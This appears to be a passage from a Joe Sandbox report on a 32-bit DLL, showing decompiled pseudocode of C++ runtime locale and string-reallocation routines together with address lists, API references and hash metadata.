					 *[fs:0x0] = _v16;
					return 4;
				} else {
					_t97 =  *_t73;
					if( *_t73 != 0) {
						goto L11;
					} else {
						_push(_t83);
						_push(__edi);
						_t84 = E6DA89399(__edi, _t83, _t97, 0x18);
						_t94 = _t92 + 4;
						_a4 = _t84;
						_t76 = _a8;
						_v8 = 0;
						_t6 = _t76 + 4; // 0x61657274
						_t48 =  *_t6;
						if(_t48 == 0) {
							_t81 = 0x6daaf2c7;
						} else {
							_t81 =  *((intOrPtr*)(_t48 + 0x18));
							if(_t81 == 0) {
								_t8 = _t48 + 0x1c; // 0x61657290
								_t81 = _t8;
							}
						}
						_t77 =  &_v72;
						E6DA888D6(_t77, 0);
						_v68 = 0;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v8 = 7;
						_t100 = _t81;
						if(_t81 == 0) {
							E6DA88889("bad locale name");
							goto L13;
						} else {
							E6DA88BB9(_t77,  &_v72, _t81);
							_v20 = 1;
							 *((intOrPtr*)(_t84 + 4)) = 0;
							_v8 = 9;
							 *_t84 = 0x6daa4e30;
							E6DA8F9AF(_t79, _t84);
							E6DA88F4F(_t100,  &_v120);
							 *((intOrPtr*)(_t84 + 8)) = 0;
							 *((intOrPtr*)(_t84 + 0x10)) = 0;
							 *((intOrPtr*)(_t84 + 0x14)) = 0;
							_v76 = _t84;
							_v8 = 0xa;
							E6DA88F4F(_t100,  &_v164);
							_push(1);
							_push(1);
							_t64 = E6DA8DD0F();
							_t94 = _t94 + 0x18;
							if(_t64 == 0) {
								L13:
								E6DA8882C(__eflags);
								goto L14;
							} else {
								_push(1);
								_push(6);
								 *_t64 = 0;
								 *((intOrPtr*)(_t84 + 8)) = _t64;
								_t77 = E6DA8DD0F();
								_t94 = _t94 + 8;
								if(_t77 == 0) {
									L14:
									E6DA8882C(__eflags);
									goto L15;
								} else {
									_t66 =  *((intOrPtr*)("false")); // 0x736c6166
									 *_t77 = _t66;
									_t67 =  *0x6daaf2f4; // 0x65
									_push(1);
									_push(5);
									 *((short*)(_t77 + 4)) = _t67;
									 *((intOrPtr*)(_t84 + 0x10)) = _t77;
									_t77 = E6DA8DD0F();
									_t94 = _t94 + 8;
									if(_t77 == 0) {
										L15:
										_t54 = E6DA8882C(__eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t84);
										_t85 =  *_t77;
										__eflags = _t85;
										if(_t85 != 0) {
											E6DA8DCF4( *((intOrPtr*)(_t85 + 8)));
											E6DA8DCF4( *((intOrPtr*)(_t85 + 0x10)));
											_t54 = E6DA8DCF4( *((intOrPtr*)(_t85 + 0x14)));
										}
										return _t54;
									} else {
										_t69 = "true"; // 0x65757274
										 *_t77 = _t69;
										_t70 =  *0x6daaf2fc; // 0x0
										 *((char*)(_t77 + 4)) = _t70;
										 *((intOrPtr*)(_t84 + 0x14)) = _t77;
										 *((short*)(_t84 + 0xc)) = 0x2c2e;
										 *_t73 = _t84;
										E6DA829E0( &_v72);
										goto L11;
									}
								}
							}
						}
					}
				}
			}









































              0x6da862f3
              0x6da862f5
              0x6da86300
              0x6da86301
              0x6da86308
              0x6da8630f
              0x6da86316
              0x6da8631b
              0x6da8647a
              0x6da86483
              0x6da8648d
              0x6da86321
              0x6da86321
              0x6da86324
              0x00000000
              0x6da8632a
              0x6da8632a
              0x6da8632b
              0x6da86333
              0x6da86335
              0x6da86338
              0x6da8633b
              0x6da8633e
              0x6da86345
              0x6da86345
              0x6da8634a
              0x6da86358
              0x6da8634c
              0x6da8634c
              0x6da86351
              0x6da86353
              0x6da86353
              0x6da86353
              0x6da86351
              0x6da8635f
              0x6da86362
              0x6da86367
              0x6da8636e
              0x6da86372
              0x6da86379
              0x6da8637f
              0x6da86386
              0x6da8638a
              0x6da8638d
              0x6da86391
              0x6da86394
              0x6da86397
              0x6da8639a
              0x6da8639d
              0x6da863a1
              0x6da863a3
              0x6da86493
              0x00000000
              0x6da863a9
              0x6da863ae
              0x6da863b3
              0x6da863ba
              0x6da863c1
              0x6da863c8
              0x6da863ce
              0x6da863d7
              0x6da863dc
              0x6da863e3
              0x6da863ea
              0x6da863f1
              0x6da863fa
              0x6da863ff
              0x6da86404
              0x6da86406
              0x6da86408
              0x6da8640d
              0x6da86412
              0x6da86498
              0x6da86498
              0x00000000
              0x6da86418
              0x6da86418
              0x6da8641a
              0x6da8641c
              0x6da8641f
              0x6da86427
              0x6da86429
              0x6da8642e
              0x6da8649d
              0x6da8649d
              0x00000000
              0x6da86430
              0x6da86430
              0x6da86435
              0x6da86437
              0x6da8643d
              0x6da8643f
              0x6da86441
              0x6da86445
              0x6da8644d
              0x6da8644f
              0x6da86454
              0x6da864a2
              0x6da864a2
              0x6da864a7
              0x6da864a8
              0x6da864a9
              0x6da864aa
              0x6da864ab
              0x6da864ac
              0x6da864ad
              0x6da864ae
              0x6da864af
              0x6da864b0
              0x6da864b1
              0x6da864b3
              0x6da864b5
              0x6da864ba
              0x6da864c2
              0x6da864ca
              0x6da864cf
              0x6da864d3
              0x6da86456
              0x6da86456
              0x6da8645b
              0x6da8645d
              0x6da86462
              0x6da86465
              0x6da86468
              0x6da86471
              0x6da86473
              0x00000000
              0x6da86479
              0x6da86454
              0x6da8642e
              0x6da86412
              0x6da863a3
              0x6da86324

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA86362
              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DA863AE
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA86498
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA8649D
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA864A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
              • String ID: bad locale name$false$true
              • API String ID: 164343898-1062449267
              • Opcode ID: c03133ba66eb068d3f536f94dcb1ad9946f2ca5657b685948d434db217e5ceea
              • Instruction ID: b868c97513d7fa5add1d267d7a15ef54c227c74f6740479991227bfaff972d36
              • Opcode Fuzzy Hash: c03133ba66eb068d3f536f94dcb1ad9946f2ca5657b685948d434db217e5ceea
              • Instruction Fuzzy Hash: 8B51E37490C305DFEB10CFB4DA4479EBBB0AF05708F18815DE914AB382DBB59A85CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA85C00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E6DA85C00(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				char _v36;
				signed int _v40;
				short _v44;
				signed int _v48;
				short _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v96;
				signed int _v108;
				char _v116;
				signed int _v120;
				signed int _v132;
				signed int _v136;
				signed int _v148;
				intOrPtr _v156;
				signed int _v168;
				signed int _t175;
				void* _t184;
				void* _t200;
				signed int _t203;
				unsigned int _t205;
				void* _t206;
				signed int _t221;
				signed int _t223;
				signed int _t224;
				unsigned int _t226;
				void* _t227;
				signed int _t230;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				unsigned int _t250;
				void* _t251;
				signed int _t265;
				signed int _t267;
				void* _t270;
				signed int _t275;
				signed int _t276;
				void* _t283;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int* _t295;
				signed int* _t296;
				signed int* _t297;
				signed int _t306;
				signed int* _t312;
				signed int _t318;
				void* _t320;
				void* _t327;
				void* _t329;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t343;
				signed int _t345;
				signed int _t346;
				unsigned int _t348;
				signed int _t349;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t365;
				intOrPtr _t366;
				signed int _t368;
				unsigned int _t369;
				signed int _t370;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t379;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				signed int _t390;
				void* _t392;
				void* _t393;
				signed int _t401;
				void* _t402;
				signed int _t404;
				void* _t405;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t428;

				_t388 = _t401;
				_push(0xffffffff);
				_push(E6DAA265C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t401;
				_t402 = _t401 - 0x3c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E6DA888D6( &_v24, 0);
				_v8 = 0;
				_t343 =  *0x6dad5cb4; // 0x0
				_t291 =  *0x6dad5c7c; // 0x0
				if(_t343 == 0) {
					E6DA888D6( &_v20, _t343);
					_t428 =  *0x6dad5cb4 - _t343; // 0x0
					if(_t428 == 0) {
						_t288 =  *0x6dad5048; // 0x0
						_t289 = _t288 + 1;
						 *0x6dad5048 = _t289;
						 *0x6dad5cb4 = _t289;
					}
					E6DA8892E( &_v20);
					_t343 =  *0x6dad5cb4; // 0x0
				}
				_t306 =  *(_a4 + 4);
				if(_t343 >=  *((intOrPtr*)(_t306 + 0xc))) {
					_t360 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t360 =  *( *((intOrPtr*)(_t306 + 8)) + _t343 * 4);
					if(_t360 == 0) {
						L8:
						__eflags =  *((char*)(_t306 + 0x14));
						if( *((char*)(_t306 + 0x14)) == 0) {
							L11:
							__eflags = _t360;
							if(_t360 != 0) {
								goto L6;
							} else {
								goto L12;
							}
						} else {
							_t283 = E6DA88AB3();
							__eflags = _t343 -  *((intOrPtr*)(_t283 + 0xc));
							if(_t343 >=  *((intOrPtr*)(_t283 + 0xc))) {
								L12:
								__eflags = _t291;
								if(__eflags == 0) {
									_t360 = E6DA89399(_t343, _t360, __eflags, 8);
									_t404 = _t402 + 4;
									_v20 = _t360;
									_t175 =  *(_a4 + 4);
									__eflags = _t175;
									if(_t175 == 0) {
										_t345 = 0x6daaf2c7;
									} else {
										_t345 =  *(_t175 + 0x18);
										__eflags = _t345;
										if(_t345 == 0) {
											_t345 = _t175 + 0x1c;
										}
									}
									E6DA888D6( &_v76, 0);
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									_v56 = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									_v40 = 0;
									_v36 = 0;
									_v32 = 0;
									_v28 = 0;
									_v8 = 8;
									__eflags = _t345;
									if(_t345 == 0) {
										E6DA88889("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t388);
										_t390 = _t404;
										_push(0xffffffff);
										_push(E6DAA2685);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t404;
										_t405 = _t404 - 0xc;
										_push(_t291);
										_push(_t360);
										_push(_t345);
										E6DA888D6( &_v116, 0);
										_v96 = 0;
										_t346 =  *0x6dad5cb8; // 0x0
										_t293 =  *0x6dad5c78; // 0x0
										_v108 = _t293;
										__eflags = _t346;
										if(_t346 == 0) {
											E6DA888D6( &_v28, _t346);
											__eflags =  *0x6dad5cb8 - _t346; // 0x0
											if(__eflags == 0) {
												_t275 =  *0x6dad5048; // 0x0
												_t276 = _t275 + 1;
												__eflags = _t276;
												 *0x6dad5048 = _t276;
												 *0x6dad5cb8 = _t276;
											}
											E6DA8892E( &_v28);
											_t346 =  *0x6dad5cb8; // 0x0
										}
										_t312 =  *(_v0 + 4);
										__eflags = _t346 - _t312[3];
										if(_t346 >= _t312[3]) {
											_t362 = 0;
											__eflags = 0;
											goto L29;
										} else {
											_t362 =  *(_t312[2] + _t346 * 4);
											__eflags = _t362;
											if(_t362 != 0) {
												L37:
												E6DA8892E( &_v32);
												 *[fs:0x0] = _v20;
												return _t362;
											} else {
												L29:
												__eflags = _t312[5];
												if(_t312[5] == 0) {
													L32:
													__eflags = _t362;
													if(_t362 != 0) {
														goto L37;
													} else {
														goto L33;
													}
												} else {
													_t270 = E6DA88AB3();
													__eflags = _t346 -  *((intOrPtr*)(_t270 + 0xc));
													if(_t346 >=  *((intOrPtr*)(_t270 + 0xc))) {
														L33:
														__eflags = _t293;
														if(_t293 == 0) {
															_t184 = E6DA862F0(_t293, _t346,  &_v24, _v0);
															_t407 = _t405 + 8;
															__eflags = _t184 - 0xffffffff;
															if(__eflags == 0) {
																E6DA82950();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t390);
																_t392 = _t407;
																_t408 = _t407 - 8;
																_push(_t293);
																_t295 = _t312;
																_t315 = 0x7fffffff;
																_push(_t362);
																_t364 = _v120;
																_t338 = _t295[4];
																_v132 = _t338;
																_push(_t346);
																__eflags = 0x7fffffff - _t338 - _t364;
																if(__eflags < 0) {
																	E6DA814C0(_t295, 0x7fffffff, _t338, __eflags);
																	goto L60;
																} else {
																	_t346 = _t295[5];
																	_t248 = _t338 + _t364;
																	_v20 = _t248;
																	_t382 = _t248 | 0x0000000f;
																	_v4 = _t346;
																	__eflags = _t382 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t250 = _t346 >> 1;
																		_t315 = 0x7fffffff - _t250;
																		__eflags = _t346 - _t315;
																		if(__eflags <= 0) {
																			_t251 = _t250 + _t346;
																			__eflags = _t382 - _t251;
																			_t364 =  <  ? _t251 : _t382;
																			_t77 = _t364 + 1; // 0x80000000
																			_t315 = _t77;
																			__eflags = _t315 - 0x1000;
																			if(_t315 < 0x1000) {
																				__eflags = _t315;
																				if(__eflags == 0) {
																					_t346 = 0;
																					__eflags = 0;
																				} else {
																					_t265 = E6DA89399(_t346, _t364, __eflags, _t315);
																					_t338 = _v16;
																					_t408 = _t408 + 4;
																					_t346 = _t265;
																				}
																				goto L53;
																			} else {
																				_t78 =  &(_t315[8]); // 0x80000023
																				_t266 = _t78;
																				__eflags = _t78 - _t315;
																				if(__eflags <= 0) {
																					L60:
																					E6DA81420();
																					goto L61;
																				} else {
																					goto L43;
																				}
																			}
																		} else {
																			_t364 = 0x7fffffff;
																			goto L42;
																		}
																	} else {
																		_t364 = 0x7fffffff;
																		L42:
																		_t266 = 0x80000023;
																		L43:
																		_t267 = E6DA89399(_t346, _t364, __eflags, _t266);
																		_t408 = _t408 + 4;
																		__eflags = _t267;
																		if(_t267 == 0) {
																			L61:
																			E6DA8DACF(_t295, _t315, _t338);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t392);
																			_t393 = _t408;
																			_t409 = _t408 - 0xc;
																			_t339 = _v136;
																			_push(_t295);
																			_t296 = _t315;
																			_t316 = 0x7fffffff;
																			_push(_t364);
																			_push(_t346);
																			_t365 = _t296[4];
																			_v148 = _t365;
																			__eflags = 0x7fffffff - _t365 - _t339;
																			if(__eflags < 0) {
																				E6DA814C0(_t296, 0x7fffffff, _t339, __eflags);
																				goto L83;
																			} else {
																				_t346 = _t296[5];
																				_t224 = _t365 + _t339;
																				_v24 = _t224;
																				_t376 = _t224 | 0x0000000f;
																				_v8 = _t346;
																				__eflags = _t376 - 0x7fffffff;
																				if(__eflags <= 0) {
																					_t226 = _t346 >> 1;
																					_t316 = 0x7fffffff - _t226;
																					__eflags = _t346 - _t316;
																					if(__eflags <= 0) {
																						_t227 = _t226 + _t346;
																						__eflags = _t376 - _t227;
																						_t365 =  <  ? _t227 : _t376;
																						_t107 = _t365 + 1; // 0x80000000
																						_t316 = _t107;
																						__eflags = _t316 - 0x1000;
																						if(_t316 < 0x1000) {
																							__eflags = _t316;
																							if(__eflags == 0) {
																								_t346 = 0;
																								__eflags = 0;
																							} else {
																								_t245 = E6DA89399(_t346, _t365, __eflags, _t316);
																								_t409 = _t409 + 4;
																								_t346 = _t245;
																							}
																							goto L76;
																						} else {
																							_t108 = _t316 + 0x23; // 0x80000023
																							_t246 = _t108;
																							__eflags = _t108 - _t316;
																							if(__eflags <= 0) {
																								L83:
																								E6DA81420();
																								goto L84;
																							} else {
																								goto L66;
																							}
																						}
																					} else {
																						_t365 = 0x7fffffff;
																						goto L65;
																					}
																				} else {
																					_t365 = 0x7fffffff;
																					L65:
																					_t246 = 0x80000023;
																					L66:
																					_t247 = E6DA89399(_t346, _t365, __eflags, _t246);
																					_t409 = _t409 + 4;
																					__eflags = _t247;
																					if(_t247 == 0) {
																						L84:
																						E6DA8DACF(_t296, _t316, _t339);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t393);
																						_t410 = _t409 - 8;
																						_push(_t296);
																						_t297 = _t316;
																						_t317 = 0x7fffffff;
																						_push(_t365);
																						_t366 = _v156;
																						_t340 = _t297[4];
																						_v168 = _t340;
																						_push(_t346);
																						__eflags = 0x7fffffff - _t340 - _t366;
																						if(__eflags < 0) {
																							E6DA814C0(_t297, 0x7fffffff, _t340, __eflags);
																							goto L106;
																						} else {
																							_t348 = _t297[5];
																							_t203 = _t340 + _t366;
																							_v28 = _t203;
																							_t368 = _t203 | 0x0000000f;
																							_v12 = _t348;
																							__eflags = _t368 - 0x7fffffff;
																							if(__eflags <= 0) {
																								_t205 = _t348 >> 1;
																								_t317 = 0x7fffffff - _t205;
																								__eflags = _t348 - _t317;
																								if(__eflags <= 0) {
																									_t206 = _t205 + _t348;
																									__eflags = _t368 - _t206;
																									_t369 =  <  ? _t206 : _t368;
																									_t146 = _t369 + 1; // 0x80000000
																									_t317 = _t146;
																									__eflags = _t317 - 0x1000;
																									if(_t317 < 0x1000) {
																										__eflags = _t317;
																										if(__eflags == 0) {
																											_t349 = 0;
																											__eflags = 0;
																										} else {
																											_t221 = E6DA89399(_t348, _t369, __eflags, _t317);
																											_t340 = _v24;
																											_t410 = _t410 + 4;
																											_t349 = _t221;
																										}
																										goto L99;
																									} else {
																										_t147 = _t317 + 0x23; // 0x80000023
																										_t222 = _t147;
																										__eflags = _t147 - _t317;
																										if(__eflags <= 0) {
																											L106:
																											E6DA81420();
																											goto L107;
																										} else {
																											goto L89;
																										}
																									}
																								} else {
																									_t369 = 0x7fffffff;
																									goto L88;
																								}
																							} else {
																								_t369 = 0x7fffffff;
																								L88:
																								_t222 = 0x80000023;
																								L89:
																								_t223 = E6DA89399(_t348, _t369, __eflags, _t222);
																								_t410 = _t410 + 4;
																								__eflags = _t223;
																								if(_t223 == 0) {
																									L107:
																									_t200 = E6DA8DACF(_t297, _t317, _t340);
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									asm("int3");
																									_t318 =  *_t317;
																									__eflags = _t318;
																									if(_t318 != 0) {
																										return  *((intOrPtr*)( *_t318))(1);
																									}
																									return _t200;
																								} else {
																									_t340 = _v24;
																									_t144 = _t223 + 0x23; // 0x23
																									_t349 = _t144 & 0xffffffe0;
																									 *(_t349 - 4) = _t223;
																									L99:
																									_t297[4] = _v28;
																									_t297[5] = _t369;
																									_t370 = _t349 + _t340;
																									_v28 = _t370;
																									__eflags = _v12 - 0x10;
																									_v24 = _v4 + _t370;
																									_push(_t340);
																									if(_v12 < 0x10) {
																										_push(_t297);
																										_push(_t349);
																										E6DA8AB10();
																										E6DA8B0A0(_t349, _t370, _v0, _v4);
																										 *_v24 = 0;
																										 *_t297 = _t349;
																										return _t297;
																									} else {
																										_t372 =  *_t297;
																										_push(_t372);
																										_push(_t349);
																										E6DA8AB10();
																										E6DA8B0A0(_t349, _v28, _v0, _v4);
																										_t320 = _v12 + 1;
																										 *_v24 = 0;
																										__eflags = _t320 - 0x1000;
																										if(_t320 < 0x1000) {
																											L103:
																											_push(_t320);
																											E6DA893C9(_t372);
																											 *_t297 = _t349;
																											return _t297;
																										} else {
																											_t340 =  *(_t372 - 4);
																											_t317 = _t320 + 0x23;
																											_t165 = _t372 - _t340 - 4; // 0x7ffffffb
																											__eflags = _t165 - 0x1f;
																											if(_t165 > 0x1f) {
																												goto L107;
																											} else {
																												_t372 = _t340;
																												goto L103;
																											}
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t105 = _t247 + 0x23; // 0x23
																						_t346 = _t105 & 0xffffffe0;
																						 *(_t346 - 4) = _t247;
																						L76:
																						_t296[4] = _v24;
																						_t230 = _v0;
																						_t296[5] = _t365;
																						_v20 = _v20 - _t230 + 1;
																						_t377 = _t346 + _t230;
																						_v28 = _t377;
																						__eflags = _v8 - 0x10;
																						_v24 = _a4 + _t377;
																						_push(_t230);
																						if(_v8 < 0x10) {
																							_push(_t296);
																							_push(_t346);
																							E6DA8AB10();
																							E6DA8B0A0(_t346, _t377, _a8, _a4);
																							__eflags = _t296 + _v0;
																							E6DA8AB10(_v24, _t296 + _v0, _v20);
																							 *_t296 = _t346;
																							return _t296;
																						} else {
																							_t379 =  *_t296;
																							_push(_t379);
																							_push(_t346);
																							E6DA8AB10();
																							E6DA8B0A0(_t346, _v28, _a8, _a4);
																							E6DA8AB10(_v24, _v0 + _t379, _v20);
																							_t409 = _t409 + 0x24;
																							_t327 = _v8 + 1;
																							__eflags = _t327 - 0x1000;
																							if(_t327 < 0x1000) {
																								L80:
																								_push(_t327);
																								E6DA893C9(_t379);
																								 *_t296 = _t346;
																								return _t296;
																							} else {
																								_t339 =  *(_t379 - 4);
																								_t316 = _t327 + 0x23;
																								_t365 = _t379 - _t339;
																								_t130 = _t365 - 4; // 0x7ffffffb
																								__eflags = _t130 - 0x1f;
																								if(_t130 > 0x1f) {
																									goto L84;
																								} else {
																									_t379 = _t339;
																									goto L80;
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t338 = _v16;
																			_t75 = _t267 + 0x23; // 0x23
																			_t346 = _t75 & 0xffffffe0;
																			 *(_t346 - 4) = _t267;
																			L53:
																			_t295[4] = _v20;
																			_t295[5] = _t364;
																			_t383 = _t346 + _t338;
																			_v20 = _t383;
																			__eflags = _v4 - 0x10;
																			_v16 = _a8 + _t383;
																			_push(_t338);
																			if(_v4 < 0x10) {
																				_push(_t295);
																				_push(_t346);
																				E6DA8AB10();
																				E6DA8AB10(_t383, _a4, _a8);
																				 *_v16 = 0;
																				 *_t295 = _t346;
																				return _t295;
																			} else {
																				_t385 =  *_t295;
																				_push(_t385);
																				_push(_t346);
																				E6DA8AB10();
																				E6DA8AB10(_v20, _a4, _a8);
																				_t408 = _t408 + 0x18;
																				_t329 = _v4 + 1;
																				 *_v16 = 0;
																				__eflags = _t329 - 0x1000;
																				if(_t329 < 0x1000) {
																					L57:
																					_push(_t329);
																					E6DA893C9(_t385);
																					 *_t295 = _t346;
																					return _t295;
																				} else {
																					_t338 =  *(_t385 - 4);
																					_t315 = _t329 + 0x23;
																					_t364 = _t385 - _t338;
																					_t94 = _t364 - 4; // 0x7ffffffb
																					__eflags = _t94 - 0x1f;
																					if(_t94 > 0x1f) {
																						goto L61;
																					} else {
																						_t385 = _t338;
																						goto L57;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t362 = _v24;
																_v0 = _t362;
																_v12 = 1;
																E6DA88A87(__eflags, _t362);
																 *((intOrPtr*)( *_t362 + 4))();
																 *0x6dad5c78 = _t362;
																goto L37;
															}
														} else {
															_t362 = _t293;
															goto L37;
														}
													} else {
														_t362 =  *( *((intOrPtr*)(_t270 + 8)) + _t346 * 4);
														goto L32;
													}
												}
											}
										}
									} else {
										E6DA88BB9( &_v76,  &_v76, _t345);
										 *((intOrPtr*)(_t360 + 4)) = 0;
										 *_t360 = 0x6daa4e00;
										E6DA829E0( &_v76);
										_a4 = _t360;
										_v8 = 9;
										E6DA88A87(__eflags, _t360);
										 *((intOrPtr*)( *_t360 + 4))();
										 *0x6dad5c7c = _t360;
										goto L6;
									}
								} else {
									_t360 = _t291;
									goto L6;
								}
							} else {
								_t360 =  *( *((intOrPtr*)(_t283 + 8)) + _t343 * 4);
								goto L11;
							}
						}
					} else {
						L6:
						E6DA8892E( &_v24);
						 *[fs:0x0] = _v16;
						return _t360;
					}
				}
			}








































































































              0x6da85c01
              0x6da85c03
              0x6da85c05
              0x6da85c10
              0x6da85c11
              0x6da85c18
              0x6da85c1b
              0x6da85c1c
              0x6da85c1d
              0x6da85c23
              0x6da85c28
              0x6da85c2f
              0x6da85c35
              0x6da85c3d
              0x6da85c43
              0x6da85c48
              0x6da85c4e
              0x6da85c50
              0x6da85c55
              0x6da85c56
              0x6da85c5b
              0x6da85c5b
              0x6da85c63
              0x6da85c68
              0x6da85c68
              0x6da85c71
              0x6da85c77
              0x6da85c9e
              0x6da85c9e
              0x00000000
              0x6da85c79
              0x6da85c7c
              0x6da85c81
              0x6da85ca0
              0x6da85ca0
              0x6da85ca4
              0x6da85cb6
              0x6da85cb6
              0x6da85cb8
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85ca6
              0x6da85ca6
              0x6da85cab
              0x6da85cae
              0x6da85cba
              0x6da85cba
              0x6da85cbc
              0x6da85cc9
              0x6da85ccb
              0x6da85cce
              0x6da85cd4
              0x6da85cd7
              0x6da85cd9
              0x6da85ce7
              0x6da85cdb
              0x6da85cdb
              0x6da85cde
              0x6da85ce0
              0x6da85ce2
              0x6da85ce2
              0x6da85ce0
              0x6da85cf1
              0x6da85cf6
              0x6da85cfd
              0x6da85d01
              0x6da85d08
              0x6da85d0e
              0x6da85d15
              0x6da85d19
              0x6da85d1c
              0x6da85d20
              0x6da85d23
              0x6da85d26
              0x6da85d29
              0x6da85d2c
              0x6da85d30
              0x6da85d32
              0x6da85d7d
              0x6da85d82
              0x6da85d83
              0x6da85d84
              0x6da85d85
              0x6da85d86
              0x6da85d87
              0x6da85d88
              0x6da85d89
              0x6da85d8a
              0x6da85d8b
              0x6da85d8c
              0x6da85d8d
              0x6da85d8e
              0x6da85d8f
              0x6da85d90
              0x6da85d91
              0x6da85d93
              0x6da85d95
              0x6da85da0
              0x6da85da1
              0x6da85da8
              0x6da85dab
              0x6da85dac
              0x6da85dad
              0x6da85db3
              0x6da85db8
              0x6da85dbf
              0x6da85dc5
              0x6da85dcb
              0x6da85dce
              0x6da85dd0
              0x6da85dd6
              0x6da85ddb
              0x6da85de1
              0x6da85de3
              0x6da85de8
              0x6da85de8
              0x6da85de9
              0x6da85dee
              0x6da85dee
              0x6da85df6
              0x6da85dfb
              0x6da85dfb
              0x6da85e04
              0x6da85e07
              0x6da85e0a
              0x6da85e18
              0x6da85e18
              0x00000000
              0x6da85e0c
              0x6da85e0f
              0x6da85e12
              0x6da85e14
              0x6da85e70
              0x6da85e73
              0x6da85e80
              0x6da85e8a
              0x6da85e16
              0x6da85e1a
              0x6da85e1a
              0x6da85e1e
              0x6da85e30
              0x6da85e30
              0x6da85e32
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85e20
              0x6da85e20
              0x6da85e25
              0x6da85e28
              0x6da85e34
              0x6da85e34
              0x6da85e36
              0x6da85e43
              0x6da85e48
              0x6da85e4b
              0x6da85e4e
              0x6da85e8b
              0x6da85e90
              0x6da85e91
              0x6da85e92
              0x6da85e93
              0x6da85e94
              0x6da85e95
              0x6da85e96
              0x6da85e97
              0x6da85e98
              0x6da85e99
              0x6da85e9a
              0x6da85e9b
              0x6da85e9c
              0x6da85e9d
              0x6da85e9e
              0x6da85e9f
              0x6da85ea0
              0x6da85ea1
              0x6da85ea3
              0x6da85ea6
              0x6da85ea7
              0x6da85ea9
              0x6da85eb0
              0x6da85eb1
              0x6da85eb4
              0x6da85eb9
              0x6da85ebc
              0x6da85ebd
              0x6da85ebf
              0x6da85fe2
              0x00000000
              0x6da85ec5
              0x6da85ec5
              0x6da85ec8
              0x6da85ecd
              0x6da85ed0
              0x6da85ed3
              0x6da85ed6
              0x6da85ed8
              0x6da85f02
              0x6da85f04
              0x6da85f06
              0x6da85f08
              0x6da85f11
              0x6da85f13
              0x6da85f15
              0x6da85f18
              0x6da85f18
              0x6da85f1b
              0x6da85f21
              0x6da85f30
              0x6da85f32
              0x6da85f44
              0x6da85f44
              0x6da85f34
              0x6da85f35
